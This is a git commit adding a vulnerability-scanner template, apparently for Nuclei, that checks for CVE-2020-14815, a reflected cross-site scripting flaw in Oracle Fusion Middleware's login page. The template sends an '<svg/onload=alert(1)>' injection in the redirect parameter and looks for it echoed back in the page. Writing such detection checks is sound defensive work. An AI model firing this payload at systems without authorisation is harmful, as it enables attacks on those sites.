Create CVE-2020-14815.yaml

patch-1
mohammedshine 2020-11-13 01:25:48 +05:30 committed by GitHub
parent 3cf5167077
commit a273c87c2e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

20
cves/CVE-2020-14815.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2020-14815
info:
name: Oracle Fusion Middleware XSS
author: Shine
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><svg/onload=alert(1)>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "value=<svg/onload=alert(1)>"
part: body